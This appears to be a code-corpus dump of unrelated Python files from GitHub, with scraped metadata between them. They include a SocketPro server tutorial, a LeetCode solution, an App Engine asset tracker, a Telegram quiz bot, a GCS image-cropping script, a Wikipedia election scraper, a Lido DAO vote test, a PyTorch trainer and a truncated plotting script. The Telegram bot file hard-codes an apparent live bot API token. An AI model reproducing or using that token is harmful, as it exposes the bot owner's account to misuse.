    CSocketProServer.PushManager.AddAChatGroup(1, "R&D Department")
    CSocketProServer.PushManager.AddAChatGroup(2, "Sales Department")
    CSocketProServer.PushManager.AddAChatGroup(3, "Management Department")
    CSocketProServer.PushManager.AddAChatGroup(7, "HR Department")
    # Reserved group id used by the DB plugins for table-change notifications.
    CSocketProServer.PushManager.AddAChatGroup(DB_CONSTS.CACHE_UPDATE_CHAT_GROUP_ID, "Subscribe/publish for front clients")
    return True  # True -- ok; False -- no listening server
server.OnSettingServer = do_configuration
mapIdMethod = {
hwConst.idSayHello: 'sayHello',
hwConst.idSleep: ['sleep', True], # or ('sleep', True)
hwConst.idEcho: 'echo'
}
server.hw = CSocketProService(CHelloWorldPeer, hwConst.sidHelloWorld, mapIdMethod)
# HTTP/WebSocket service
server.HttpSvs = CSocketProService(CMyHttpPeer, BaseServiceID.sidHTTP, None)
mapIdReq = {}
server.Pi = CSocketProService(CClientPeer, piConst.sidPi, mapIdReq)
server.PiWorker = CSocketProService(CClientPeer, piConst.sidPiWorker, mapIdReq)
if not CSocketProServer.Router.SetRouting(piConst.sidPi, piConst.sidPiWorker):
print('Setting routing failed')
# load file streaming library at the directory ../bin/free_services/file
# 16 * 1024 dequeue batch size in bytes
server.aq = CSocketProServer.DllManager.AddALibrary('uasyncqueue', 16 * 1024)
# load async sqlite library located at the directory ../bin/free_services/sqlite
server.sqlite = CSocketProServer.DllManager.AddALibrary("ssqlite")
if server.sqlite:
# monitoring sakila.db table events (DELETE, INSERT and UPDATE) for
# tables actor, language, category, country and film_actor
jsonOptions = '{"global_connection_string":"usqlite.db","monitored_tables":\
"sakila.db.actor;sakila.db.language;sakila.db.category;sakila.db.country;sakila.db.film_actor"}'
SetSPluginGlobalOptions(jsonOptions.encode('utf-8'))
# load persistent message queue library at the directory ../bin/free_services/queue
server.file = CSocketProServer.DllManager.AddALibrary('ustreamfile')
# load MySQL/MariaDB server plugin library at the directory ../bin/free_services/mm_middle
server.mysql = CSocketProServer.DllManager.AddALibrary("smysql")
# load ODBC server plugin library at the directory ../bin/win or ../bin/linux
server.odbc = CSocketProServer.DllManager.AddALibrary("sodbc")
# load MS sql server plugin library at the directory ../bin/win or ../bin/linux
server.mssql = CSocketProServer.DllManager.AddALibrary("usqlsvr")
# load PostgreSQL plugin library at the directory ../bin/win/win64 or ../bin/linux
server.postgres = CSocketProServer.DllManager.AddALibrary("spostgres")
if not server.Run(20901):
print('Error message = ' + CSocketProServer.ErrorMessage)
print('Read a line to shutdown the application ......')
line = sys.stdin.readline()
| udaparts/socketpro | tutorials/python/all_servers/all_servers.py | all_servers.py | py | 7,957 | python | en | code | 27 | github-code | 36 | [
{
"api_name": "sys.platform",
"line_number": 14,
"usage_type": "name"
},
{
"api_name": "sys.platform",
"line_number": 32,
"usage_type": "name"
},
{
"api_name": "sys.platform",
"line_number": 43,
"usage_type": "name"
},
{
"api_name": "sys.platform",
"line_numbe... |
34980505423 | #存在重复
# 给定一个整数数组,判断是否存在重复元素。
# 如果任何值在数组中出现至少两次,函数返回 true。如果数组中每个元素都不相同,则返回 false。
#===============================================================================
# 输入: [1,2,3,1]
# 输出: true
#===============================================================================
from collections import Counter
class Solution:
    def containsDuplicate(self, nums):
        """Return True if any value appears at least twice in nums.

        :type nums: List[int]
        :rtype: bool
        """
        # A set drops duplicates, so the array has a repeat exactly when its
        # set is smaller than the list.  O(n) time, and simpler than building
        # a Counter and scanning its counts.
        return len(set(nums)) < len(nums)
result=Solution().containsDuplicate([1,1,1,3,3,4,3,2,4,2])
print(result) | huowolf/leetcode | src/array/containsDuplicate.py | containsDuplicate.py | py | 775 | python | fr | code | 0 | github-code | 36 | [
{
"api_name": "collections.Counter",
"line_number": 15,
"usage_type": "call"
}
] |
9744073954 | import sys
import os
import logging
import urllib
from datetime import datetime, timedelta
from google.appengine.ext import ndb
from google.appengine.api import users
from google.appengine.ext import blobstore
sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
from common.arguments import *
from common.errors import *
from users.users import build_user_key
sys.path.append(os.path.join(os.path.dirname(__file__), '../..'))
import lib.parsedatetime
log = logging.getLogger("assets")
def key(asset_id):
    """Build the NDB key for the asset with the given numeric id."""
    numeric_id = int(asset_id)
    return ndb.Key(Asset, numeric_id)
def create(actor, asset_id=None, asset_key=None, **kwargs):
    """Create a new Asset in "new" condition, then apply the given fields.

    Delegates field population and persistence to update().
    """
    new_asset = Asset(key=asset_key or key(asset_id))
    new_asset.condition = "new"
    new_asset.created_by = build_user_key(actor)
    return update(actor, asset=new_asset, **kwargs)
def update(actor, asset_id=None, asset_key=None, asset=None, name=undefined,
           description=undefined, serial=undefined, condition=undefined,
           cost=undefined, value=undefined, url=undefined, **ignored):
    """Apply every caller-supplied field to the asset and persist it.

    Fields left at the ``undefined`` sentinel are untouched.
    """
    asset = asset or (asset_key or key(asset_id)).get()

    # Copy over the simple string fields the caller actually supplied.
    for attr, supplied in (("name", name), ("url", url),
                           ("description", description),
                           ("serial", serial), ("condition", condition)):
        if is_defined(supplied):
            setattr(asset, attr, supplied)

    # Monetary fields are coerced to float; empty/zero values are skipped.
    if is_defined(cost) and cost:
        asset.cost = float(cost)
    if is_defined(value) and value:
        asset.value = float(value)

    # Guarantee a displayable name: fall back to the key id.
    if not asset.name:
        asset.name = str(asset.key.id())

    asset.put()
    return asset
def delete(actor, asset_id=None, asset_key=None, asset=None):
    """Delete the asset from the datastore.

    Bug fix: ndb.Model instances have no ``delete()`` method (that was the
    old ``ext.db`` API); deletion goes through the entity's key.
    """
    asset = asset or get(actor, asset_id, asset_key)
    asset.key.delete()
def get(actor, asset_id=None, asset_key=None, silent=False):
    """Fetch an asset by key or id.

    Raises NotFoundError when missing, unless ``silent`` is set, in which
    case None is returned instead.
    """
    entity = (asset_key or key(asset_id)).get()
    if entity:
        return entity
    if silent:
        return None
    raise NotFoundError()
def list(actor):
    """Return a query over all assets.  (Name shadows the builtin ``list``;
    kept for interface compatibility with callers.)"""
    all_assets = Asset.query()
    return all_assets
def search(**ignored):
    """Placeholder: asset search is not implemented yet."""
    pass
def check_out(actor, asset=None, asset_key=None, asset_id=None, checked_out_to=undefined,
              project=undefined, expected=undefined, timezoneoffset=None, **ignored):
    """Check an asset out, recording who took it and an optional due time.

    ``expected`` is free-form text parsed with parsedatetime; when
    ``timezoneoffset`` (minutes west of UTC) is given, it is interpreted in
    the client's local time and converted back to UTC.
    Raises IllegalError if the asset is already checked out.
    """
    asset = asset or get(actor, asset_key=asset_key, asset_id=asset_id)
    if asset.checkout:
        raise IllegalError("Asset is already checked out")

    checkout = AssetCheckout(parent=asset.key)
    checkout.checked_out_by = build_user_key(actor)
    # Default recipient is the actor; may be overridden below.
    checkout.checked_out_to = build_user_key(actor)
    checkout.condition_out = asset.condition

    if is_defined(expected):
        if expected == "":
            expected = None
        else:
            if timezoneoffset:
                offset = timedelta(minutes=int(timezoneoffset))
                client_time = datetime.utcnow() - offset
                parsed_time = lib.parsedatetime.Calendar().parse(expected, client_time)
            else:
                # Bug fix: was ``datetime.timedelta(0)``; ``datetime`` here is
                # the class imported from the datetime module and has no
                # ``timedelta`` attribute, so this branch raised AttributeError.
                offset = timedelta(0)
                parsed_time = lib.parsedatetime.Calendar().parse(expected)
            # parse() returns (struct_time, flag); flag == 1 means date-only,
            # so keep only year/month/day in that case.
            if parsed_time[1] == 1:
                checkout.expected = datetime(*parsed_time[0][:3]) + offset
            else:
                checkout.expected = datetime(*parsed_time[0][:6]) + offset

    if is_defined(checked_out_to) and checked_out_to:
        checkout.checked_out_to = build_user_key(checked_out_to)
    if is_defined(project) and project:
        checkout.project = project
    checkout.put()

    asset.checkout = checkout.key
    asset.put()
    return checkout
def check_in(actor, asset=None, asset_key=None, asset_id=None, condition=undefined, **ignored):
    """Check a previously checked-out asset back in, recording its condition.

    Raises IllegalError if the asset is not currently checked out.
    """
    asset = asset or get(actor, asset_key=asset_key, asset_id=asset_id)
    if not asset.checkout:
        raise IllegalError("Asset is not checked out")

    checkout = asset.checkout.get()
    checkout.checked_in_by = build_user_key(actor)
    checkout.checked_in = datetime.now()
    # Caller-supplied condition wins; otherwise keep the asset's current one.
    checkout.condition_in = condition if is_defined(condition) else asset.condition
    checkout.put()

    asset.checkout = None
    asset.condition = checkout.condition_in
    asset.put()
    return checkout
valid_conditions = ["new", "excellent", "good", "poor", "unusable", "gone"]
class Asset(ndb.Model):
    """Trackable piece of equipment; may be checked out via AssetCheckout."""
    # Display name; defaults to the key id when left blank (see update()).
    name = ndb.StringProperty(required=True)
    url = ndb.StringProperty()
    description = ndb.StringProperty()
    serial = ndb.StringProperty()
    condition = ndb.StringProperty(required=True, default="new", choices=valid_conditions)
    # Monetary fields stored as floats (purchase cost vs. current value).
    cost = ndb.FloatProperty()
    value = ndb.FloatProperty()
    # Key of the active AssetCheckout, or None when the asset is available.
    checkout = ndb.KeyProperty(kind='AssetCheckout')
    created_by = ndb.KeyProperty(kind='User')
    created = ndb.DateTimeProperty(auto_now_add=True)
class AssetCheckout(ndb.Model):
    """One check-out/check-in cycle of an Asset (child entity of the asset)."""
    # Check out fields
    checked_out_to = ndb.KeyProperty(kind='User', required=True)
    project = ndb.KeyProperty(kind='Project')
    checked_out = ndb.DateTimeProperty(auto_now_add=True)
    checked_out_by = ndb.KeyProperty(kind='User', required=True)
    condition_out = ndb.StringProperty(required=True, choices=valid_conditions)
    # Expected return time; optional.
    expected = ndb.DateTimeProperty()
    # Check in fields (unset while the checkout is still open)
    checked_in = ndb.DateTimeProperty()
    checked_in_by = ndb.KeyProperty(kind='User')
    condition_in = ndb.StringProperty(choices=valid_conditions)
| AegisTools/aegis-appengine | modules/assets/assets_private.py | assets_private.py | py | 5,339 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "sys.path.append",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "os.path.join",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number... |
35622258622 | import boto3
import base64
import os
ENDPOINT_NAME = os.environ['ENDPOINT_NAME']
def lambda_handler(event, context):
    """Handler of the lambda function: proxy the request body to the
    SageMaker endpoint and return the inference result with CORS headers."""
    # The SageMaker runtime client is what lets us invoke the endpoint.
    sagemaker_runtime = boto3.Session().client('sagemaker-runtime')

    # Forward the incoming body (image in base64) to the configured endpoint.
    endpoint_response = sagemaker_runtime.invoke_endpoint(
        EndpointName=ENDPOINT_NAME,
        ContentType='application/json',
        Body=event['body'])

    # The inference result is the body of the endpoint's HTTP response.
    inference = endpoint_response['Body'].read().decode('utf-8')

    cors_headers = {'Content-Type': 'text/plain',
                    'Access-Control-Allow-Origin': '*',
                    'Access-Control-Allow-Headers': 'Content-Type',
                    'Access-Control-Allow-Methods': 'OPTIONS,GET,POST'}
    return {'statusCode': 200,
            'headers': cors_headers,
            'body': inference}
{
"api_name": "os.environ",
"line_number": 4,
"usage_type": "attribute"
},
{
"api_name": "boto3.Session",
"line_number": 10,
"usage_type": "call"
}
] |
29540265563 | import telebot
from telebot import types
bot = telebot.TeleBot('1507860102:AAH3y4nFwQgnYJCFP49PMRRqQVEvhIGrLmw')
user_dict = {}
class User:
    """Quiz participant: name is set at creation, age/sex are filled in later."""
    def __init__(self, name):
        self.name = name
        self.age = None
        self.sex = None
# Handle '/start' and '/help'
# Handle '/start' and '/help'
@bot.message_handler(commands=['help', 'start'])
def send_welcome(message):
    """Greet the user and ask whether to continue with the quiz."""
    keyboard = types.ReplyKeyboardMarkup(one_time_keyboard=True)
    keyboard.add('Tak', 'Nie')
    greeting = """\
Cześć witam w quize.
Kontynujemy?
"""
    msg = bot.reply_to(message, greeting, reply_markup=keyboard)
    # Route the user's Tak/Nie answer to the next step of the dialogue.
    bot.register_next_step_handler(msg, start_quiz_step)
def start_quiz_step(message):
    """Branch on the user's Tak/Nie answer to the welcome question."""
    try:
        chat_id = message.chat.id
        reply = message.text
        if reply == "Tak":
            prompt = bot.reply_to(message, 'Jak masz na imię?')
            bot.register_next_step_handler(prompt, process_name_step)
        elif reply == "Nie":
            bot.send_message(chat_id, 'Miło było cię poznać')
        else:
            raise Exception("Unknown answer")
    except Exception as e:
        bot.reply_to(message, 'oooops')
def process_name_step(message):
    """Record the user's name and ask for their age."""
    try:
        chat_id = message.chat.id
        # Remember this chat's participant under its chat id.
        user_dict[chat_id] = User(message.text)
        prompt = bot.reply_to(message, 'Ile masz lat?')
        bot.register_next_step_handler(prompt, process_age_step)
    except Exception as e:
        bot.reply_to(message, 'oooops')
def process_age_step(message):
    """Validate the age answer, store it, then ask for gender."""
    try:
        chat_id = message.chat.id
        age = message.text
        if not age.isdigit():
            msg = bot.reply_to(message, 'Age should be a number. How old are you?')
            # Bug fix: re-ask the *age* question.  The original registered
            # process_name_step here, so the retry answer would overwrite the
            # user's name with the age text.
            bot.register_next_step_handler(msg, process_age_step)
            return
        user = user_dict[chat_id]
        user.age = age
        markup = types.ReplyKeyboardMarkup(one_time_keyboard=True)
        markup.add('Male', 'Female')
        msg = bot.reply_to(message, 'What is your gender', reply_markup=markup)
        bot.register_next_step_handler(msg, process_sex_step)
    except Exception as e:
        bot.reply_to(message, 'oooops')
def process_sex_step(message):
    """Validate the gender answer and echo the collected profile back."""
    try:
        chat_id = message.chat.id
        user = user_dict[chat_id]
        gender = message.text
        if gender not in ('Male', 'Female'):
            raise Exception("Unknown sex")
        user.sex = gender
        summary = ('Nice to meet you ' + user.name +
                   '\n Age:' + str(user.age) + '\n Sex:' + user.sex)
        bot.send_message(chat_id, summary)
    except Exception as e:
        bot.reply_to(message, 'oooops')
# Enable saving next step handlers to file "./.handlers-saves/step.save".
# Delay=2 means that after any change in next step handlers (e.g. calling register_next_step_handler())
# saving will hapen after delay 2 seconds.
bot.enable_save_next_step_handlers(delay=2)
bot.polling(none_stop=True) | HKarpenko/teleBot | main.py | main.py | py | 2,905 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "telebot.TeleBot",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "telebot.types.ReplyKeyboardMarkup",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "telebot.types",
"line_number": 18,
"usage_type": "name"
},
{
"api_name": "telebo... |
32542353820 | from google.cloud import storage
from configparser import ConfigParser
from google.oauth2 import service_account
from googleapiclient.discovery import build
from utils.demo_io import (
get_initial_slide_df_with_predictions_only,
get_fovs_df,
get_top_level_dirs,
populate_slide_rows,
get_histogram_df,
list_blobs_with_prefix,
get_combined_spots_df,
crop_spots_from_slide,
)
import polars as pl
from gcsfs import GCSFileSystem
cutoff = 10  # how many slides to view cropped spot images from

# Parse in key and bucket name from config file
cfp = ConfigParser()
cfp.read("config.ini")
service_account_key_json = cfp["GCS"]["gcs_storage_key"]
gs_url = cfp["GCS"]["bucket_url"]
bucket_name = gs_url.replace("gs://", "")

# Define GCS file system so files can be read
gcs = GCSFileSystem(token=service_account_key_json)

# Authenticate using the service account key file
credentials = service_account.Credentials.from_service_account_file(
    service_account_key_json, scopes=["https://www.googleapis.com/auth/cloud-platform"]
)
client = storage.Client.from_service_account_json(service_account_key_json)

# Create a storage client
storage_service = build("storage", "v1", credentials=credentials)

# List blobs under the analysis prefix; over-fetch (cutoff * 2) because
# non-.npy blobs are filtered out just below.
slide_files_raw = list_blobs_with_prefix(
    client, bucket_name, prefix="patient_slides_analysis", cutoff=cutoff * 2
)["blobs"]
# NOTE(review): str.strip(".npy") strips *characters* ('.', 'n', 'p', 'y')
# from both ends, not the suffix -- slide names beginning/ending with those
# characters would be mangled.  Consider str.removesuffix instead.
slides_of_interest = [
    slidefile.split("/")[-1].strip(".npy")
    for slidefile in slide_files_raw
    if slidefile.endswith(".npy")
]

for sl in slides_of_interest:
    spot_df = get_combined_spots_df(bucket_name, gcs, sl)
    print(spot_df)
    # Keep the 20 spots with the highest "parasite output" score and double
    # the radius column for a wider crop.
    spot_df_top = spot_df.sort(pl.col("parasite output"), descending=True).head(20)
    spot_df_top = spot_df_top.with_columns(spot_df_top["r"].cast(pl.Int64) * 2)
    spot_coords = []
    for spot in spot_df_top.rows(named=True):
        spot_coords.append(
            (
                spot["FOV_row"],
                spot["FOV_col"],
                spot["FOV_z"],
                spot["x"],
                spot["y"],
                spot["r"],
            )
        )
    print(spot_df_top)
    # Crop each selected spot out of the slide image and display it.
    spot_imgs = crop_spots_from_slide(storage_service, bucket_name, sl, spot_coords)
    for img in spot_imgs:
        img.show()
| alice-gottlieb/nautilus-dashboard | examples/spot_cropping_example.py | spot_cropping_example.py | py | 2,247 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "configparser.ConfigParser",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "gcsfs.GCSFileSystem",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "google.oauth2.service_account.Credentials.from_service_account_file",
"line_number": 34,
"u... |
20471993107 | from pprint import pprint
from bs4 import BeautifulSoup
import requests
import pandas as pd
import pprint
# Accumulates one parsed row per election from the Wikipedia table.
election = []

# Spoof a desktop-browser user agent so Wikipedia serves the regular page.
user_agent = "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.37"
URL = "https://en.wikipedia.org/wiki/List_of_United_States_presidential_elections_by_popular_vote_margin"

response = requests.get(URL, headers={'User-Agent': user_agent})
html = response.content
soup = BeautifulSoup(html, "lxml")

# Walk every table row on the page, keeping only non-empty cell texts.
for tr in soup.find_all('tr'):
    data = []
    for td in tr:
        clean_text = td.get_text().strip('\n')
        if len(clean_text) < 1:
            continue
        # Special-case the row with no winning candidate so its columns
        # still line up with the rest of the table.
        if clean_text == ',No candidate[a]':
            clean_text = 'No Candidate, ' + ', '
        data.append(clean_text)
    # Skip header rows and rows too short to be a complete record.
    if (data == []) or (len(data) < 10):
        continue
    election.append(data)

# pprint.pprint(election)
df = pd.DataFrame(election, columns = [
    'election_number', 'year', 'winner',
    'party', 'number_electoral_votes', 'electoral_perc',
    'pop_vote_perc', 'pop_margin_perc', 'number_pop_votes',
    'number_pop_margin', 'runner_up_name', 'runner_up_party', 'turnout_perc'])
# utf-8-sig adds a BOM so Excel opens the accented names correctly.
df.to_csv(f'../datasets/elections.csv', sep=',', encoding='utf-8-sig', index = False)
{
"api_name": "requests.get",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "bs4.BeautifulSoup",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "pandas.DataFrame",
"line_number": 30,
"usage_type": "call"
}
] |
5547367389 | """
Tests for Voting 21/06/2022 [Lido app for Goerli].
"""
import pytest
from brownie import interface
from scripts.vote_2022_06_21_goerli_lido_app import (
start_vote,
get_lido_app_address,
get_lido_app_old_version,
)
from utils.test.tx_tracing_helpers import *
from utils.config import network_name
from utils.config import lido_dao_lido_repo
def get_lido_app_old_content_uri():
    """Return the pre-vote Lido app content URI for the current network."""
    net = network_name()
    if net in ("goerli", "goerli-fork"):
        return (
            "0x697066733a516d526a43546452626a6b4755613774364832506e7377475a7965636e4e5367386f736b346b593269383278556e"
        )
    if net in ("mainnet", "mainnet-fork"):
        return (
            "0x697066733a516d516b4a4d7476753474794a76577250584a666a4c667954576e393539696179794e6a703759714e7a58377053"
        )
    assert False, f'Unsupported network "{net}"'
def get_lido_app_old_ipfs_cid():
    """Return the pre-vote Lido app IPFS CID for the current network."""
    net = network_name()
    if net in ("goerli", "goerli-fork"):
        return "QmRjCTdRbjkGUa7t6H2PnswGZyecnNSg8osk4kY2i82xUn"
    if net in ("mainnet", "mainnet-fork"):
        return "QmQkJMtvu4tyJvWrPXJfjLfyTWn959iayyNjp7YqNzX7pS"
    assert False, f'Unsupported network "{net}"'
lido_old_app = {
"address": get_lido_app_address(),
"ipfsCid": get_lido_app_old_ipfs_cid(),
"content_uri": get_lido_app_old_content_uri(),
"version": get_lido_app_old_version(),
}
lido_new_app = {
"address": get_lido_app_address(),
"ipfsCid": "QmScYxzmmrAV1cDBjL3i7jzaZuiJ76UqdaFZiMgsxoFGzC",
"content_uri": "0x697066733a516d536359787a6d6d724156316344426a4c3369376a7a615a75694a373655716461465a694d6773786f46477a43",
"version": (8, 0, 4),
}
def test_vote(helpers, accounts, ldo_holder, dao_voting, vote_id_from_env, bypass_events_decoding, dao_agent, lido):
    """End-to-end check that the vote bumps the Lido app in the Aragon repo
    from the old version/IPFS CID to the new one, and contains one item."""
    # Validate old Lido app.
    # getLatest() usage below implies (version, address, contentURI) ordering.
    lido_repo = interface.Repo(lido_dao_lido_repo)
    lido_old_app_from_chain = lido_repo.getLatest()
    print(lido_old_app_from_chain)

    # check old versions of lido app is correct
    assert lido_old_app["address"] == lido_old_app_from_chain[1]
    assert lido_old_app["version"] == lido_old_app_from_chain[0]
    assert lido_old_app["content_uri"] == lido_old_app_from_chain[2]

    # check old ipfs link: the on-chain content URI is ASCII "ipfs:<CID>".
    bytes_object = lido_old_app_from_chain[2][:]
    lido_old_ipfs = bytes_object.decode("ASCII")
    lido_old_app_ipfs = f"ipfs:{lido_old_app['ipfsCid']}"
    assert lido_old_app_ipfs == lido_old_ipfs

    # START VOTE (reuse an existing vote id from the environment if given).
    vote_id = vote_id_from_env or start_vote({"from": ldo_holder}, silent=True)[0]
    tx: TransactionReceipt = helpers.execute_vote(
        vote_id=vote_id, accounts=accounts, dao_voting=dao_voting, skip_time=3 * 60 * 60 * 24
    )

    # validate vote events
    assert count_vote_items_by_events(tx, dao_voting) == 1, "Incorrect voting items count"

    # Validate vote items 4: new lido app
    ## check only version and ipfs was changed
    lido_new_app_from_chain = lido_repo.getLatest()
    assert lido_new_app["address"] == lido_new_app_from_chain[1]
    assert lido_new_app["version"] == lido_new_app_from_chain[0]
    assert lido_new_app["content_uri"] == lido_new_app_from_chain[2]

    ## check new ipfs link
    bytes_object = lido_new_app_from_chain[2][:]
    lido_old_ipfs = bytes_object.decode("ASCII")
    lido_new_app_ipfs = f"ipfs:{lido_new_app['ipfsCid']}"
    assert lido_new_app_ipfs == lido_old_ipfs

    # Event decoding is skipped on networks where it is not supported.
    display_voting_events(tx)
    if bypass_events_decoding or network_name() in ("goerli", "goerli-fork"):
        return
| lidofinance/scripts | archive/tests/test_2022_06_21_2_goerli_lido_app.py | test_2022_06_21_2_goerli_lido_app.py | py | 3,523 | python | en | code | 14 | github-code | 36 | [
{
"api_name": "utils.config.network_name",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "utils.config.network_name",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "utils.config.network_name",
"line_number": 28,
"usage_type": "call"
},
{
"api... |
31353500311 | #!/usr/bin/env python3
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
import os
import sys
import torch
import torch.nn as nn
import torch.nn.parallel
import torch.backends.cudnn as cudnn
import torch.optim
from colorama import Fore
import config
from dataloader import getDataloaders
from utils import getModel, save_checkpoint, get_optimizer, optimizer_device, create_save_folder, filter_fixed_params
from args import arg_parser, arch_resume_names
from train_val import Trainer
from tensorboardX import SummaryWriter
dev = torch.device('cuda') if torch.cuda.is_available() else torch.device('cpu')
def main():
# parse arg and start experiment
global args
best_err1 = 100.
best_epoch = 0
now_epoch = 0
args = arg_parser.parse_args()
args.config_of_data = config.datasets[args.data]
args.num_classes = config.datasets[args.data]['num_classes']
# optionally resume from a checkpoint
if args.resume:
if args.resume and os.path.isfile(args.resume):
print("=> loading checkpoint '{}'".format(args.resume))
checkpoint = torch.load(args.resume)
old_args = checkpoint['args']
print('Old args:')
print(old_args)
# set args based on checkpoint
if args.start_epoch <= 1:
args.start_epoch = checkpoint['epoch'] + 1
now_epoch = args.start_epoch - 1
best_epoch = checkpoint['best_epoch']
best_err1 = checkpoint['best_err1']
print('pre best err1:{} @epoch{}'.format(best_err1, best_epoch))
# for name in arch_resume_names:
# if name in vars(args) and name in vars(old_args):
# setattr(args, name, getattr(old_args, name))
model = getModel(**vars(args))
model.load_state_dict(checkpoint['model_state_dict'])
model = nn.DataParallel(model) if torch.cuda.device_count() > 1 else model
model = model.to(dev)
training_params = filter_fixed_params(model, args.fixed_module_flags)
optimizer = get_optimizer(training_params, args)
if args.load_optimizer:
optimizer.load_state_dict(checkpoint['optimizer_state_dict'])
optimizer_device(optimizer, dev)
print('optimizer.state_dict():')
print(optimizer.state_dict()["param_groups"])
print("=> loaded checkpoint '{}' (epoch {})"
.format(args.resume, checkpoint['epoch']))
else:
print(
"=> no checkpoint found at '{}'".format(
Fore.RED +
args.resume +
Fore.RESET),
file=sys.stderr)
return
else:
# create model
print("=> creating model '{}'".format(args.arch))
model = getModel(**vars(args))
model = nn.DataParallel(model) if torch.cuda.device_count() > 1 else model
model = model.to(dev)
training_params = filter_fixed_params(model, args.fixed_module_flags)
optimizer = get_optimizer(training_params, args)
cudnn.benchmark = True
# check if the folder exists
create_save_folder(args.save, args.force)
# define loss function (criterion) and pptimizer
criterion = nn.CrossEntropyLoss().to(dev)
# set random seed
torch.manual_seed(args.seed)
trainer = Trainer(model, criterion, optimizer, args)
# create dataloader
if args.evaluate == 'train':
train_loader, _, _ = getDataloaders(
splits=('train'), **vars(args))
trainer.test(train_loader, now_epoch)
return
elif args.evaluate == 'val':
_, val_loader, _ = getDataloaders(
splits=('val'), **vars(args))
trainer.test(val_loader, now_epoch)
return
elif args.evaluate == 'test':
_, _, test_loader = getDataloaders(
splits=('test'), **vars(args))
trainer.test(test_loader, now_epoch, write=True)
return
else:
train_loader, val_loader, _ = getDataloaders(
splits=('train', 'val'), **vars(args))
# set up logging
global log_print, f_log
f_log = open(os.path.join(args.save, 'log.txt'), 'w')
def log_print(*args):
print(*args)
print(*args, file=f_log)
log_print('args:')
log_print(args)
print('model:', file=f_log)
print(model, file=f_log)
log_print('# of params:',
str(sum([p.numel() for p in model.parameters()])))
f_log.flush()
f_log.close()
torch.save(args, os.path.join(args.save, 'args.pth'))
scores = ['epoch\tlr\ttrain_loss\tval_loss\ttrain_err1'
'\tval_err1\ttrain_err5\tval_err5']
if args.tensorboard:
writer = SummaryWriter(os.path.join(args.save, 'log_dir'))
for epoch in range(args.start_epoch, args.epochs + 1):
# simulate 10 fold validation
if epoch % (args.epochs / 10) == 0:
args.seed += 5
train_loader, val_loader, _ = getDataloaders(
splits=('train', 'val'), **vars(args))
# train for one epoch
train_loss, train_err1, train_err5, lr = trainer.train(
train_loader, epoch)
# evaluate on validation set
val_loss, val_err1, val_err5 = trainer.test(val_loader, epoch)
if args.tensorboard:
writer.add_scalar('Lr', lr, epoch)
writer.add_scalars('Err/err1', {'train_err1': train_err1,
'val_err1': val_err1}, epoch)
writer.add_scalars('Err/err5', {'train_err5': train_err5,
'val_err5': val_err5}, epoch)
writer.add_scalars('Loss', {'train_loss': train_loss,
'val_loss': val_loss}, epoch)
# save scores to a tsv file, rewrite the whole file to prevent
# accidental deletion
scores.append(('{}\t{}' + '\t{:.4f}' * 6)
.format(epoch, lr, train_loss, val_loss,
train_err1, val_err1, train_err5, val_err5))
with open(os.path.join(args.save, 'scores.tsv'), 'w') as f:
print('\n'.join(scores), file=f)
# remember best err@1 and save checkpoint
is_best = val_err1 < best_err1
if is_best:
best_err1 = val_err1
best_epoch = epoch
print(Fore.GREEN + 'Best var_err1 {} @ ep{}'.format(best_err1, best_epoch) +
Fore.RESET)
# test_loss, test_err1, test_err1 = validate(
# test_loader, model, criterion, epoch, True)
# save test
save_checkpoint({
'args': args,
'epoch': epoch,
'best_epoch': best_epoch,
'arch': args.arch,
'model_state_dict': model.module.state_dict() if torch.cuda.device_count() > 1 else model.state_dict(),
'optimizer_state_dict': optimizer.state_dict(),
'best_err1': best_err1}, is_best, args.save)
if not is_best and epoch - best_epoch >= args.patience > 0:
break
with open(os.path.join(args.save, 'scores.tsv'), 'a') as f:
print('Best val_err1: {:.4f} at epoch {}'.format(best_err1, best_epoch), file=f)
if __name__ == '__main__':
main()
| KoapT/img_classification_pytorch | main.py | main.py | py | 7,409 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "torch.cuda.is_available",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "torch.cuda",
"line_number": 24,
"usage_type": "attribute"
},
{
"api_name": "torch.device",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "args.arg_parser.... |
12760265976 | import numpy as np
import matplotlib.pyplot as plt
sp_LL=np.loadtxt('spline_LL.txt')
sp_LH=np.loadtxt('spline_LH.txt')
sp_HT=np.loadtxt('spline_HT.txt')
sp_R=np.loadtxt('spline_R.txt')
##
AA=np.loadtxt('HT_p_T_c')
BB=np.loadtxt('LH_p_T_c')
CC=np.loadtxt('R_p_T_c')
DD=np.loadtxt('LL_p_T_c')
EE=np.loadtxt('TP_T-x-Perr-p-u-v.txt')
###%%% Top %%%
#Top = np.zeros((10,2))
#Top[:,0] = np.linspace(0.0088,0.1706,num=10);
#Top[:,1] = 68569;
u_HT_A = AA[:,0]
v_HT_A = AA[:,1]
#p_HT_A = AA[:,2]
T_HT_A = AA[:,3]
t_HT_A = AA[:,3]
u_LH_B = BB[:,0]
v_LH_B = BB[:,1]
#p_LH_B = BB[:,2]
T_LH_B = BB[:,3];
u_R_C = CC[:,0];
v_R_C = CC[:,1];
#p_R_C = CC(:,3);
T_R_C = CC[:,3];
u_LL_D = DD[:,0];
v_LL_D = DD[:,1];
#p_LL_D = DD(:,3);
T_LL_D = DD[:,3];
u_TP_E = EE[:,4]
v_TP_E = EE[:,5]
#p_TP_E = EE[:,3]
T_TP_E = EE[:,0]
###########################isobar single phase 8,5,2,1######################################
u_HT_isoT400 = []
v_HT_isoT400 = []
u_HT_isoT350 = []
v_HT_isoT350 = []
u_HT_isoT300 = []
v_HT_isoT300 = []
u_HT_isoT230 = []
